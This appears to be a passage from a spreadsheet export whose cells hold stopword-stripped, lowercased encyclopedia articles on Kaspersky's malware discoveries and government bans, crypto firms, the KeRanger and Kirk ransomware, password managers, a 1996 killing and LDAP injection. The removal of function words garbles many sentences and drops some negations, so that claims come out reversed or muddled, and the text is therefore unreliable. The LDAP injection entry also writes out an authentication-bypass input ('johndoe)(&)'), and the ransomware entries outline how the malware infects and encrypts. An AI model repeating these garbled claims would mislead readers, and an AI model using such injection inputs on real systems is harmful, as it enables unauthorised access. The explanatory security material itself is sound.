series government-sponsored cyber-espionage sabotage efforts. these include stuxnet, duqu, flame, gauss, regin equation group. according wired, "many [were] seemingly launched israeli allies. kaspersky especially well-known work uncovering stuxnet flame." stuxnet 2010, kaspersky worked microsoft counter-act stuxnet worm, infected industrial locations iran using four zero-day vulnerabilities microsoft windows. according ieee spectrum, circumstances "strongly suggest" worm developed united states israel damage centrifuges iran's nuclear-enrichment program. first discovery major government-sponsored cyber-attack. flame 2012, kaspersky identified malware flame, researcher described potentially "the sophisticated cyber weapon unleashed". according researchers kaspersky lab, malware infected estimated 1,000 5,000 machines worldwide asked united nations international telecommunication union investigate reports virus affecting iranian ministry computers. kaspersky investigated, discovered hash filename appeared customer machines middle eastern nations. after discovering pieces, researchers dubbed program "flame" name modules.flame earlier variant stuxnet. kaspersky never verified source software, suspected developed national security agency (nsa) transmit keystrokes, skype calls data. kaspersky created algorithms find similar malware found gauss july, collected transmitted data devices infected bluetooth drives. october january 2013, kaspersky discovered october malware, used widespread cyber-espionage five years. targeted political targets like embassies, nuclear sites, mostly europe, switzerland north america. malware likely written russian-speaking hackers exploits chinese hackers. that june, kaspersky discovered nettraveler, said obtaining data emerging technology government targets companies. kaspersky identify behind similar cyber-espionage coming beijing, china. later year, kaspersky discovered hacker group called icefog investigating cybersecurity attack japanese television company. kaspersky said hacker group, possibly china, unique targeted specific files seemed know planting malware extract them. maskin february 2014, kaspersky identified malware mask, infected organizations countries. many organizations affected morocco. some files spanish group believed nation-state conducting espionage, kaspersky speculate country developed regin november 2014, symantec kaspersky authored papers contained first disclosure malicious software named regin. according kaspersky, regin similar qwerty, malware program discovered next year. regin used take remote control computer believed originated five eyes alliance. that month kaspersky reported darkhotel attack, targeted users wireless networks hotels asia. asked users update software, downloaded malware gave passwords. equation group 2015, kaspersky identified highly sophisticated threat actor called "the equation group". group incorporated sophisticated spying software firmware hard drives banks, government agencies, nuclear researchers military facilities, countries frequent targets intelligence efforts. suspected developed national security agency (nsa) included many unique technical achievements better avoid detection. that day, kaspersky announced discovery hacker group called carbanak, targeting banks moving millions dollars fake accounts. carbanak discovered bank asked kaspersky investigate suspicious behavior atms. similar malware using techniques carbanak discovered 2016 dubbed carbanak 2.0. duqu june 2015, kaspersky reported network infiltrated government-sponsored malware. evidence suggested malware created developers duqu stuxnet, order intelligence would help better avoid detection kaspersky future. kaspersky called duqu 2.0. malicious software resided memory avoid detection. hack believed done group duqu 2011. used exploits microsoft installer files. android cyber-espionage june 2015, kaspersky citizen independently discovered software developed hacking team used governments around world covertly record data mobile phones citizens. software gave police enforcement "menu features" access emails, text messages, keystrokes, call history data. kaspersky also identified 37,000 attacks banking companies used modifications malware called asacub took control android devices. asacub targeted mostly banking customers u.s., russia ukraine using message baited users installing trojan. silverlightin 2016, kaspersky discovered zero vulnerability microsoft silverlight. kaspersky identified string code often used exploits created suspected author. used yara rules network kaspersky software users find string code uncover rest exploit. afterwards, microsoft issued "critical" software patch protect software vulnerability. poseidon groupin 2016, kaspersky uncovered poseidon group, would infiltrate corporations malware using phishing emails, hired company security firm correct problem. once hired, poseidon would install additional malware backdoors. june 2016 kaspersky helped uncover russian hacking group, leading arrests. titanium 2019, kaspersky uncovered titanium, advanced insidious backdoor malware apt, developed platinum, cybercrime collective. kaspersky reported malware november 2019. bans allegations russian government ties since 2015, kaspersky alleged close ties russian government various western media outlets, finally government itself. 2017, president trump signed legislation software kaspersky government computers. government institutions prohibited buying installing kaspersky software computers devices.in 2022, russian invasion ukraine, government warned american businesses risk using kaspersky software increased added kaspersky list threats u.s. national security. kaspersky responded fcc’s move press release website, saying agency’s decision “made political grounds” light russia’s invasion ukraine, company “remains ready cooperate government agencies address fcc’s regulatory agency’s concerns.” also notes references external links official website cyber threat real-time cybersecurity discoveries</t>
  </si>
  <si>
    <t>Kaspersky Mobile Security</t>
  </si>
  <si>
    <t>Kaspersky bans and allegations of Russian government ties</t>
  </si>
  <si>
    <t>kaspersky faced controversy allegations engaged russian federal security service (fsb) software scan computers worldwide material interest—ties company actively denied. u.s. department homeland security banned kaspersky products government departments september 2017, alleging kaspersky worked secret projects russia's federal security service (fsb). october 2017, subsequent reports alleged hackers working russian government stole confidential data home computer national security agency (nsa) contractor 2015 kaspersky antivirus software. kaspersky denied allegations, stating software detected equation group malware samples uploaded servers analysis normal course operation. company since announced commitments increased accountability, soliciting independent reviews verification software's source code, announcing would migrate core infrastructure selected foreign customers russia switzerland. allegations ties russian government ignited company's controversial response 2022 russian invasion ukraine. alleged russian intelligence collaboration according international york times, kaspersky "become russia's recognized high-tech exports, market-share united states hampered origins". according gartner, "there's evidence back-doors software ties russian mafia state... still concern can't operate russia without controlled ruling party". eugene kaspersky prior work russian military education kgb-sponsored technical college allegations employed russia expose cyberweapons, though denies this. analysts gartner's peter firstbrook suspicions firm's russian roots hindered expansion company denied direct ties engaged russian government.in august 2015, bloomberg news reported kaspersky changed course 2012, "high-level managers left fired, jobs often filled people closer ties russia's military intelligence services. some people actively criminal investigations fsb, kgb's successor, using data million customers". eugene kaspersky criticized bloomberg's coverage blog, calling coverage sensationalist guilty exploiting paranoia increase readership.from july 2017 december 2017, u.s. government agencies phased kaspersky software. july 2017, united states' general services administration (gsa) removed kaspersky list vendors authorized business u.s. government amid reports bloomberg mcclatchy alleging kaspersky worked secret projects russia's federal security service (fsb). anti-russian sentiment also grown country wake investigation russian interference 2016 presidential election. kaspersky denied reports, stating "inappropriate ties" government, "never received request russian government affiliated organization create participate secret projects, including anti-ddos protection".on september 2017, u.s. electronics store chain best pulled kaspersky products amid concerns ties, followed u.s. retailers office office depot. september 2017, department homeland security issued order stating days kaspersky products banned within u.s. civilian federal government, citing "[concerns] ties certain kaspersky officials russian intelligence government agencies, requirements russian allow russian intelligence agencies request compel assistance kaspersky intercept communications transiting russian networks." theft controversy october 2017, wall street journal citing "multiple people knowledge matter" alleged 2015, hackers working russian government used kaspersky antivirus software steal classified material home computer belonging national security agency (nsa) contractor. according report, incident occurred 2015 remained undiscovered early 2016. stolen material reportedly included "details penetrates foreign computer networks, computer code uses spying defends networks inside u.s." york times reported hacks discovered israeli intelligence agents hacked kaspersky's network recorded real time queries made keywords user machines.on june 2015, eugene kaspersky blog announced kaspersky labs discovered advanced attack internal network claiming confidence there's nation state behind calling attack duqu 2.0.on october 2017, wall street journal additionally alleged russian intelligence uses kaspersky software scan computers worldwide material interest. company denied reports, arguing "baseless paranoia" "witch hunt", considered suspicious major u.s. media outlets simultaneously "went almost full force fantasized simultaneously, receiving order, they've confused details."on october 2017, kaspersky confirmed incident described wall street journal occurred 2014, result software detected file containing samples source code equation group. user enabled kaspersky security network (ksn) features software, files automatically uploaded kaspersky malware sample analysis, assumption malware variant. eugene kaspersky stated ordered sample destroyed. kaspersky claimed antivirus software temporarily disabled pc's user order install pirated copy microsoft office. when software re-enabled, detected equation group code, well unrelated backdoor infections created keygen program office, facilitated third-party access computer. concerns raised governments november 2017, british intelligence agency raised suspicions kaspersky software distributed free million barclays customers. december 2017, barclay's announced would longer provide customers company's software. also around december 2017, britain's national cyber security center advised, national security precaution, government departments avoid russia-based anti-virus software kaspersky, stated compelling case present extend advice" wider public. december 2017, u.s. government banned kaspersky federal civilian military computers part broader defense bill.on december 2017, lithuanian government bans kaspersky software sensitive computers claiming threat lithuanian national security.on 2018, dutch government announced decided phase anti-virus software made kaspersky labs precautionary measure” advising companies involved safeguarding vital services same.on june 2018, european union passed motion labeled kaspersky "confirmed malicious" part report cyber defense written estonian urmas paet committee foreign affairs. report "calls perform comprehensive review software, communications equipment infrastructure used institutions order exclude potentially dangerous programmes devices, ones confirmed malicious, kaspersky lab." resolution approved votes favor against. kaspersky responded claiming amendment report based untrue statements temporarily halting numerous collaborative european cybercrime-fighting initiatives.on march 2022, german federal office information security known "bsi" urged consumers anti-virus software made russia's kaspersky, warning firm could implicated hacking assaults amid russia's ukraine. according agency, antivirus software extensive system authorizations must maintain permanent connection manufacturer's servers. claims russian manufacturer forced partake attack targets nato, germany. kaspersky published statement twitter feed concerning recommendation stop using kaspersky.on march 2022, italian government announced would curb russian anti-virus software public sector wake russia's invasion ukraine, fearing moscow could hijack programs hack websites. twitter advertising january 2018, twitter banned kaspersky advertising twitter, stating "kaspersky operates using business model inherently conflicts acceptable twitter business practices", citing department homeland security's warning kaspersky. transparency initiative data-centers moves october 2017, kaspersky announced "global transparency initiative", would accountable security issues surrounding products select countries, would allow third-party analysts validate products business practices order validate integrity. company stated trust "must repeatedly earned ongoing commitment transparency accountability", program "reaffirmation company's commitment earning maintaining trust customers partners every day."on 2018, kaspersky announced would migrating "core infrastructure" russia data centers switzerland. kaspersky software antivirus definitions foreign markets compiled digitally signed switzerland 2018 (products targeting russia still compiled existing domestic infrastructure). user data europe, united states, canada, australia, zealand, japan, bangladesh, brunei, cambodia, india, indonesia, south korea, laos, malaysia, nepal, pakistan, philippines, singapore, lanka, thailand vietnam markets stored processed swiss servers 2022. countries continue processed moscow, russia. november 2020 kaspersky finished relocating data foreign customers russia switzerland.kaspersky, addressing relocation data processing data many countries moved switzerland continues processed russia stated based market specifics, customer demands local regulation.kaspersky maintains data centers zurich, switzerland; frankfurt, germany; toronto, canada; moscow, russia. swiss operations overseen third-party organization holding "all access necessary verify trustworthiness products business processes", accompanied three planned "transparency center" facilities, "responsible stakeholders" allowed inspect kaspersky's source code business practices verify integrity. kaspersky stated move "first foremost response evolving, ultra-connected global landscape challenges cyber-world currently facing", step goal accountable trustworthy business practices.kaspersky transparency centers operating zurich, madrid, kuala lumpur paulo. early 2021, north american transparency center open brunswick, canada partnership cybernb association. kaspersky's transparency centers, company provides opportunity compile company's software source code compare publicly available one.the transparency centers source code reviews address methods used alleged theft controversy. theft controversy alleged performed moscow, russia data center results scanning users machines reside russian russian government compel kaspersky's assistance intercepting communications move russian computer networks.the anti-virus software works computers installed requires significant control computer discover malware. anti-virus software retrieve, delete, modify file computer. review kaspersky source code nothing would stand standard features functionality routine antivirus products process hunting viruses malware. these features functions would create flags source code reviews promoted transparency centers. this makes anti-virus software inherently advantageous channel conduct espionage. "u.s. official said transparency centers "even leaf" address u.s. government's concerns" "moscow software engineers handle [software] updates, that's risk comes," said. "they send malicious commands updaters comes russia." lawsuits federal government december 2017 february 2018 company sued trump administration, arguing bill attainder violation process, arguing government unfairly tarnished kaspersky's reputation. both cases dismissed 2018, judge colleen kollar-kotelly, former presiding judge foreign intelligence surveillance court, declaring unsubstantial. russian invasion ukraine february 2022, 2022 russian invasion ukraine began. february, eugene kaspersky signed letter customers reaffirming kaspersky's priority fulfillment obligations partners customers highlighting transparency initiative. mention russia made mention ukraine around watching events unfolding around ukraine. u.s. government began privately warning american companies russia invaded ukraine moscow could manipulate software designed russian cybersecurity company kaspersky cause harm.on february 2022, 10,000 employees russian companies (including kaspersky lab) signed petition opposing russian governments actions ukraine stating "we, employees russian industry, categorically military operations territory ukraine initiated armed forces russian federation. consider display force leads outbreak unjustified call reversal decisions could inevitably entail human casualties side. countries always close other. today worried ukrainian colleagues, friends relatives." connection adoption russian duma tougher laws, march 2022, even came force, acceptance signatures petition stopped. "also, march 2022, distribution letter communication media ceased. connection adoption laws, considered unsafe leave letter public domain list signers". "there names, opinion leaders influencers behind letter, people mainly signed shared telegram messengers.” eugene kaspersky sign form prior removal. march 2022, date first cease-fire talks russia ukraine, eugene kaspersky made following statement twitter, welcome start negotiations resolve current situation ukraine hope lead cessation hostilities compromise. believe peaceful dialogue possible instrument resolving conflicts. good anyone". this statement much controversy failed condemn russia invading ukraine mention russia.the company interview made statement: "kaspersky focused mission build safer world. years, company delivers deep threat intelligence security expertise constantly transforming innovative security solutions services protect businesses, critical infrastructure, governments consumers around globe. kaspersky's business operations remain stable. company guarantees fulfillment obligations partners customers—including product delivery support financial transaction continuity. global management team monitoring situation carefully ready quickly needed." this ignited renewed conversation around kaspersky allegations russian government ties support russian government.on march 2022, german bundesamt sicherheit informationstechnik (bsi) issued warning usage kaspersky antivirus cloud software, claiming could used cyberattacks foreign agencies. kaspersky responded public letter stating accusations based "political grounds" rather technical assessment products working clarification decision means address regulators concerns.on march 2022, eintracht frankfurt german sports club announced terminated sponsoring agreement russian software company kaspersky immediate effect.on march 2022, italian government announced would curb russian anti-virus software public sector wake russia's invasion ukraine, fearing moscow could hijack programs hack websites.on march 2022, scuderia ferrari announced pause partnership kaspersky began 2010, comes ferrari donated million help ukrainians affected russian invasion. partnership pause kaspersky logos removed ferrari activities. ferrari also stated kaspersky software would evaluated.on march 2022, federal communications commission (fcc) kaspersky national security list, saying poses "unacceptable risk" united states' national security. this forbids kaspersky receiving funds universal service fund. this follows previous forbidding united states government agencies using products made firm. kaspersky responded fcc's move press release website, saying agency's decision “made political grounds” light russia's invasion ukraine, company “remains ready cooperate government agencies address fcc's regulatory agency's concerns.”on march 2022, wall street journal published article stating biden administration split proposal sanction kaspersky labs invasion ukraine. division administration driven deep concern action could trigger response, addition, officials u.s. europe fear sanctioning kaspersky increase likelihood triggering cyberattack west moscow, even potentially leveraging software itself." idea using sanctions kaspersky labs eugene kaspersky directly hold now. should united states department treasury asked sanction kaspersky would "block freeze assets companies individuals targeted u.s. citizens engaging transactions companies people."on april 2022, government poland imposing sanctions russian oligarchs companies. individuals list include eugene kaspersky, founder russian cybersecurity company kaspersky. sanctions include freezing assets and, individuals named, entering poland. time writing: kaspersky poland page longer working site. also duqu 2022 ukraine cyberattacks references</t>
  </si>
  <si>
    <t>Bitwala</t>
  </si>
  <si>
    <t>bitwala (now nuri) blockchain banking service, headquartered berlin, germany founded jörg minckwitz, goslicki, benjamin jones october 2015. bitwala's concept first emerged october 2015 founders jörg minckwitz, goslicki, benjamin jones launched operations global blockchain-based payment service provider headquartered berlin, germany. according wired, contrast money transfer services like western union, money gram, transferwise, german startup utilised digital currency offer much faster cheaper solution. during bitwala's formerly hosted product global reach. their services enabled sepa swift money transfers exchanging bitcoin altcoins fiat currencies bank account countries worldwide.in january 2018, bitwala stopped services prepaid card provider, wavecrest holdings visa license withdrawn compliance issues. company amongst many cryptocurrency service providers including cryptopay, tenx wirex could longer sustain full product offering.bitwala joined european fintech alliance august 2018. company launched website october 2018, coincided announcement partnership solarisbank, berlin-based white label bank.in september 2018, bitwala raised million euro venture capital investors earlybird coparion, enabling proceed re-launch november 2018. december 2018 bitwala launched europe's first regulated blockchain banking solution enables users manage bitcoin euro deposits place safety convenience german bank account. bank account hosted berlin-based solarisbank. later, changed name nuri started promoting user offering euro first trading bonus. however, trap behind trading bonus. they used exclude users bonus saying sole intention generate bonus. within short duration time, able reach huge amount users fooling them.nuri filed insolvency tuesday, august 9th, 2022. their press-release states users funds investments safe partner bank solarisbank. references</t>
  </si>
  <si>
    <t>Bitstamp</t>
  </si>
  <si>
    <t>bitstamp cryptocurrency exchange based luxembourg. allows trading fiat currency, bitcoin cryptocurrencies. allows usd, eur, gbp, bitcoin, algo, xrp, ether, litecoin, bitcoin cash, xlm, link, network, coin deposits withdrawals. company founded european-focused alternative then-dominant bitcoin exchange gox. while company trades dollars, accepts fiat money deposits free european union's single euro payments area, mechanism transferring money european bank accounts.bitstamp offers allow clients custom software access control accounts. history company headed nejc kodrič, widely known member bitcoin community, co-founded company august 2011 damijan merlak native slovenia, later moved registration april 2013, luxembourg 2016. bitstamp outsourced certain operations lack adequate financial legal services slovenia.when incorporating united kingdom, company approached uk's financial conduct authority guidance, told bitcoin classed currency, exchange subject regulation. bitstamp says instead regulates itself, following best practices authenticate customers deter money laundering. september 2013, company began requiring account holders verify identity copies passports official records home address.in april 2016, luxembourgish government granted license bitstamp fully regulated payment institution, allowing business member states.in april 2018, nexon rumored talks purchase bitstamp.in october 2018, bitstamp acquired nxmh, belgium-based investment company.in october 2020, bitstamp matching engine update nasdaq. service disruptions february 2014, company suspended withdrawals several days face distributed denial-of-service. bitcoin magazine reported people behind attack sent ransom demand bitcoins kodrič, refused company policy negotiating “terrorists”.in january 2015, bitstamp suspended service hack less 19,000 bitcoins stolen, reopening nearly week later. compliance september 2018 york attorney general office produced 42-page "virtual markets integrity initiative report" requesting fourteen virtual currency exchanges participate survey. report aimed create greater transparency regarding security, anti-hacking measures business practices. bitstamp among platforms responded; noted ten, bitstamp among seven confirmed sought approval, directly subsidiary, york state department financial services (“dfs”) operate virtual currency business york state. report goes approval implies agreement actively protect deposited funds, prevent money laundering illegal activity, respond risks. bitstamp exchanges claimed block access exchange vpns. addition providing policies, bitstamp also claimed conduct audits virtual currency holdings. notes references external links official website</t>
  </si>
  <si>
    <t>KeRanger</t>
  </si>
  <si>
    <t>keranger (also known osx.keranger.a) ransomware trojan horse targeting computers running macos. discovered march 2016, palo alto networks, affected 7,000 users. keranger remotely executed victim's computer compromised installer transmission, popular bittorrent client downloaded official website. hidden .dmg file general.rtf. .rtf actually mach-o format executable file packed 3.91. when users click infected apps, bundle executable transmission.app/content/macos/transmission copy general.rtf file ~/library/kernel_service execute "kernel_service" user interface appearing. encrypts files public cryptography, decryption stored attacker's servers. malware creates file, called "readme_to_decrypt.txt", every folder. when instructions opened, gives victim directions decrypt files, usually demanding payment bitcoin. ransomware considered variant linux ransomware linux.encoder.1. discovery march 2016, palo alto networks added ransomeware.keranger.osx virus database. days after, published description breakdown code. propagation according palo alto research center, keranger commonly infected transmission official website compromised, infected .dmg uploaded look like "real" transmission. after reported, makers transmission issued download website pushed software update. malware infected victim's computer using valid developer signature issued apple, allowed bypass apple's built-in security. encryption process first time executes, keranger create three files ".kernel_pid", ".kernel_time" ".kernel_complete" ~/library directory write current time ".kernel_time". sleep three days. after that, collect information mac, includes model name uuid. after collects information, uploads command control servers. these servers’ domains sub-domains onion[.]link onion[.]nu, domains host servers accessible network. after connects command control servers, returns data "readme_for_decrypt.txt" file. tells user files encrypted, etc. need bitcoin, used roughly $400 united states dollar. keranger encrypts file (e.g. test.docx) first creating encrypted version uses .encrypted extension (i.e. test.docx.encrypted.) encrypt file, keranger starts generating random number (rn) encrypts retrieved server using algorithm. stores encrypted beginning resulting file. next, generate initialization vector (iv) using original file’s contents store inside resulting file. after that, generate encryption key. finally, encrypt contents original file write encrypted data result file. encrypted files after connecting server, retrieve encryption key, start process. first encrypt "/users" folder, "/volumes" there also file extensions encrypted, documents: .doc, .docx, .docm, .dot, .dotm, .ppt, .pptx, .pptm, .pot, .potx, .potm, .pps, .ppsm, .ppsx, .xls, .xlsx, .xlsm, .xlt, .xltm, .xltx, .txt, .csv, .rtf, images: .jpg, .jpeg audio video: .mp3, .mp4, .avi, .mpg, .wav, .flac archives: .zip, .rar., .tar, .gzip source code: .cpp, .asp, .csh, .class, .java, .lua database: .db, .sql email: .eml certificate: .pem references</t>
  </si>
  <si>
    <t>KeePassXC</t>
  </si>
  <si>
    <t>keepassxc free open-source password manager. started community fork keepassx (itself cross-platform port keepass). built using libraries, making multi-platform application linux, windows, macos.keepassxc uses keepass (.kdbx) password database format native format. also import (and convert) version older keepass (.kdb) databases. keepassxc supports files yubikey challenge-response additional security.the electronic frontier foundation mention keepassxc example password manager open-source free." tech collective privacytools included keepassxc list recommended password manager software active development. also list password managers cryptography references external links official website keepassxc github</t>
  </si>
  <si>
    <t>KeeWeb</t>
  </si>
  <si>
    <t>keeweb free open-source password manager compatible keepass, available version desktop apps. underlying file format kdbx (keepass database file). technology keeweb written javascript uses webcrypto webassembly process password files browser, without uploading server. synchronize files popular file hosting services, dropbox, google drive, onedrive.keeweb also available electron bundle resembles desktop app. desktop version adds features available web: auto-typing passwords ability open save local files sync webdav without cors enabledkeeweb also deployed standalone server, installed nextcloud app. reception keeweb praised ghacks technology news 2016 "brand-new" fixing "shortcoming web-based version" keepass, tech advisor 2020 "well-designed cross-platform password manager". also list password managers password manager cryptography references external links official website keeweb nextcloud github</t>
  </si>
  <si>
    <t>KeepVault</t>
  </si>
  <si>
    <t>keepvault online backup service perform online local backups windows-based personal computers servers. keepvault uses storage-based pricing model allows offer unlimited users devices account. keepvault technology uses end-to-end encryption files accessed computers web. history keepvault first created proxure 2006. january 2012 proxure acquired authentec, inc. following authentec, inc.’s acquisition apple, inc., keepvault acquired group original developers became independent company. products keepvault offers windows desktop application windows server add-in, plan types (home professional) well free local backup. distribution 2007 keepvault early vendor backup microsoft launched windows home server. keepvault shipped data vault mediasmart servers.starting 2013, keepvault dashboard add-in preinstalled western digital sentinel server series. backup awareness week joint business community effort keepvault launched backup awareness week 2014. “backup week” designed educate public risks data loss, ways protect data. criticism 2008 bloggers complained unlimited data plans. since keepvault taken position unlimited plans unsustainable. also list online backup services references external links official website</t>
  </si>
  <si>
    <t>BlackVPN</t>
  </si>
  <si>
    <t>blackvpn (stylized blackvpn) service offered hong kong-based company blackvpn limited. blackvpn featured aes-256 encryption leak protection. service offered apps manual configurations windows, mac, ios, android, linux, routers. company also maintained strict no-logging policy. history blackvpn founded 2009.in march 2019, blackvpn remote servers locations countries, including australia, canada, japan, united kingdom united states. blackmail incident april 2016, blackvpn claimed received blackmail armada collective hacker group. according blackvpn, group threatened perform ddos attack servers april ransom 10.08 bitcoins paid. blackvpn also stated service providers received e-mail april service provider airvpn suffered similar threat attack time, unclear whether sender e-mails simply imitated group indeed armada collective. april ddos mitigation provider cloudflare called threats fake, stating single attack launched threatened organization. reception march 2016, dutch computer magazine computer!totaal (c!t) listed blackvpn nine best services available. however, noted service's relatively high price lack client potential downsides.in july 2017, engadget author violet blue mentioned blackvpn "names come trusted" service industry.torrentfreak interviewed blackvpn annual comparison providers 2011 blackvpn discontinued. also comparison virtual private network services references external links blackvpn's official website</t>
  </si>
  <si>
    <t>Killing of Sharon Lopatka</t>
  </si>
  <si>
    <t>sharon rina lopatka (september 1961 october 1996) internet entrepreneur hampstead, maryland, united states killed case apparent consensual homicide. lopatka tortured strangled death october 1996, robert "bobby" frederick glass, computer analyst north carolina. apparent purpose mutual sexual gratification. case reportedly first police department arrested murder suspect evidence primarily gathered email messages. background sharon lopatka first four daughters born orthodox jewish parents mrs. abraham denburg. they members beth tfiloh congregation, abraham cantor synagogue. raised baltimore, maryland, sharon seen classmates normal get", wrote news observer, part sport teams school's choir club. graduating pikesville high school 1979, lopatka married construction worker victor ellicott city, maryland, 1991, moved ranch-esque tract house hampstead, maryland, early 1990s. marriage described classmate lopatka "way breaking away", parents support it.in 1995, lopatka started online advertising businesses ellicott city home order make additional money. first website hosted, "house dion", selling home decor guides mail seven dollars. advertisement website read, "home decorating secrets seen posh homes england states hollywood homes yours. never published before! quick easy ways decorate home."she paid advertisement rewriting copy business titled "classified concepts". several websites distributing psychic readings, also garnering percentage money sales services premium-rate telephone numbers advertised websites.in addition advertising psychic reading business, lopatka marketed pornographic content, alias nancy carlson, depicted women unconscious drugged, hypnotized chloroformed engaging acts other. sold undergarments, advertisement reading, anyone interested buying worn panties..." also used internet fulfill sexual desires often considered irregular society. lopatka went pseudonyms personas pornographic chat rooms sites like fetishfeet.com sexbondage.com members fetishes necrophilia, bondage sadomasochism. more messages showed sexual desire tortured death discovered news observer. lopatka's character carlson, disciplinarian dominatrix pornographic film actress weighed pounds, pseudonyms used chats. this alarmed workers' rights activist named tanith tried stop lopatka's behavior. lopatka replied tanith want real thing. preaching me."robert "bobby" frederick glass worked computer analyst government catawba county, north carolina, nearly years. tasks included programming rolls keeping track amount vehicle consumption county. years 1996, glass married wife sherri, couple daughters son. later marriage, sherri noticed husband spending much time computer her. wary, logged email account found several "raw, violent disturbing" messages sent pseudonyms toyman slowhand. result, separated. lopatka first glass august 1996 pornographic chat room. through email, lopatka presented fetish tortured glass, sent messages would fulfill fantasy. close pages emails discovered police investigation lopatka's death. killing investigation morning october 1996, lopatka informed husband going georgia meet acquaintances. also left note would returning home requested track glass. note also read, body never retrieved, worry: know peace." that morning, lopatka drove blue honda civic baltimore's pennsylvania station 45-minute drive) arrived amtrak train charlotte, north carolina, 8:45 p.m. glass drove lopatka pickup truck rural lenoir, north carolina mobile home, miles charlotte.lopatka's husband victor found note wife left notified police, found weeks email conversations lopatka glass. email correspondence glass, lopatka explicitly asked glass torture death.glass, interviewed later imprisonment, admitted fulfilling lopatka's torture fantasy, also said death accident. recalled, know much pulled rope never wanted kill her, ended dead." this supported autopsy performed john butts, chief state medical examiner north carolina, stated lopatka accidentally strangled death three days arrival north carolina. however, police disagreed: search warrant affidavits described death intentional, emails proved it.north carolina police staked glass's home several days, lopatka. october 1996, judge beverly beal issued search warrant home, inside house, investigators discovered items belonging lopatka. addition, also found drug bondage equipment, child pornography magazines, .357 magnum pistol, several computer disks, well trash toys outside trailer. police officer noticed mound soil feet away home, finding bodyparts buried half feet below. glass arrested work following discovery, charged first-degree murder, held without bond caldwell county jail. glass also faced additional state federal charges possession child pornography. county investigator brown said lopatka's body might never found buried woods behind glass's house.glass pleaded guilty voluntary manslaughter sexual exploitation charges january 2000, sentenced 36–53 months avery-mitchell correctional institution. also sentenced additional months federal charges second-degree minor exploitation, served consecutively.glass found dead heart attack prison february 2002, month finish state sentence begin federal sentence. influence lopatka case reportedly first murder suspect custody police department mainly evidence emails. majority media coverage lopatka's killing mainly focus dangerous consequences internet-held meetings. several people requested form censorship created better protect humans killings like lopatka's, anti-censorship activists counter-argued people could better express controversial beliefs open forum without need real identity. writers labeled situation earliest examples psychologists called mardi gras phenomenon, uses variety personalities decrease chances consequence actions. thanks popularity case, psychologists increased desire better understanding atypical sexual desires caused sadism, masochism asphyxia. cultural references case inspired 2008 film, downloading nancy, premiered sundance film festival wider release 2009. interviews screenwriter ross indicate aware lopatka case found "dark, horrible intriguing". also autassassinophilia crime maryland crime north carolina internet suicide internet homicide armin meiwes references bibliography bell, rachael. date death". crime library. archived original april 2003. retrieved august 2016.</t>
  </si>
  <si>
    <t>Kirk Ransomware</t>
  </si>
  <si>
    <t>kirk ransomware, kirk, malware. encrypts files infected computer demands payment decryption cryptocurrency monero. ransomware first discovered 2017, avast researcher jakub kroustek. description kirk ransomware trojan horse program masquerades orbit cannon, application used stress testing denial-of-service attacks. once activated, kirk ransomware searches infected computer's hard drive files certain filename extensions, encrypts renames them, adding .kirked filenames. when encryption finished, window pops displaying ascii image captain james kirk spock star trek: original series, informing user files "encrypted using military grade encryption." "spock rescue!" ransom note continues, demands payment order receive decryptor program named spock. ransom demanded initially monero (worth $1,175 march 2017); paid within hours, demand begins increasing, reaching monero weeks. ransom remains unpaid days, decryption deleted, essentially rendering encryption irreversible. ransom note includes spurious quotation spock ("logic, motherfucker"), ends "live long prosper".kirk ransomware first known ransomware demand payment monero; ransomware demanded bitcoins. monero significantly greater privacy protection bitcoin, making transactions much difficult trace.a variant kirk ransomware, named lick ransomware, also discovered; contain star trek references. references</t>
  </si>
  <si>
    <t>LDAP injection</t>
  </si>
  <si>
    <t>computer security, ldap injection code injection technique used exploit applications could reveal sensitive user information modify information represented ldap (lightweight directory access protocol) data stores. ldap injection exploits security vulnerability application manipulating input parameters passed internal search, modify functions. when application fails properly sanitize user input, possible attacker modify ldap statement. technical implementation ldap injection occurs user input properly sanitized used part dynamically generated ldap filter. this results potential manipulation ldap statements performed ldap server either view, modify, bypass authentication credentials. prevention ldap injection known attack prevented simple measures. client supplied input must checked/sanitized characters result malicious behavior. input validation verify input checking presence special characters part ldap query language, known data types, legal values, etc. white list input validation also used detect unauthorized input passed ldap query. example example query constructed validate user's credentials purpose logging string filter “(&amp;(user user_name (password user_password “))”; typical case, user would provide user credentials filter would used validate credentials. however, attacker enter crafted input variable user_name johndoe)(&amp;) value password. finished query become (&amp;(user johndoe)(&amp;))(password pass)). only first portion query processed ldap server (&amp;(user johndoe)(&amp;), always evaluates true allowing attacker gain access system without needing provide valid user credentials. also injection, similar malicious attack method references</t>
  </si>
  <si>
    <t>Bitcoin Magazine</t>
  </si>
  <si>
    <t>bitcoin magazine original news print magazine publishers covering bitcoin digital currencies. bitcoin magazine began publishing 2012. co-founded vitalik buterin, mihai alisie, matthew wright, vladimir marchenko, vicente currently owned operated nashville, tennessee. history vitalik buterin became interested bitcoin 2011, co-founded periodical bitcoin magazine mihai alisie, asked join. alisie living romania time buterin writing blog. buterin's writing captured attention alisie, subsequently decided start magazine. buterin took role head writer side project attending university.in 2012, bitcoin magazine began publishing print edition, base south korea referred first serious publication dedicated cryptocurrencies. buterin noted spent 10-20 hours week writing publication.in early 2015, bitcoin magazine sold current owners, inc. bitcoin magazine smithsonian physical copy 2014 edition bitcoin magazine displayed smithsonian museum part value money exhibit. becoming bitcoin december 2018, according company blog post, david bailey announced bitcoin magazine "would returning roots shifting focus bitcoin-related stories only." bitcoin magazine ukraine september 2021, bitcoin magazine announced launch eastern european bureau based kyiv. bitcoin magazine december 2021, england patriots quarterback jones partnered bitcoin magazine gift bitcoin bitcoin magazine subscriptions offensive line. bitcoin conference bitcoin 2019 june 2019, bitcoin magazine hosted bitcoin 2019 west francisco, california.speakers conference included edward snowden, cathie wood, keiser, draper. bitcoin 2020 bitcoin 2020 cancelled complications covid-19 pandemic. bitcoin 2021 june 2021, bitcoin magazine hosted bitcoin 2021 mana wynwood miami, florida. there approximately 12,000 attendees.speakers conference included jack dorsey, paul, kevin o'leary, cynthia lummis, tyler winklevoss, cameron winklevoss, francis suarez, warren davidson, floyd mayweather jr., tony hawk.in prerecorded speech, salvador president nayib bukele announced plans adopt bitcoin legal tender central american nation. bitcoin 2022 bitcoin 2022 took place april 2022 miami beach convention center miami beach, florida. speakers included adam back, michael saylor, jordan peterson, andrew yang. references external links official website bitcoin conference website</t>
  </si>
  <si>
    <t>Bitcoin Law</t>
  </si>
  <si>
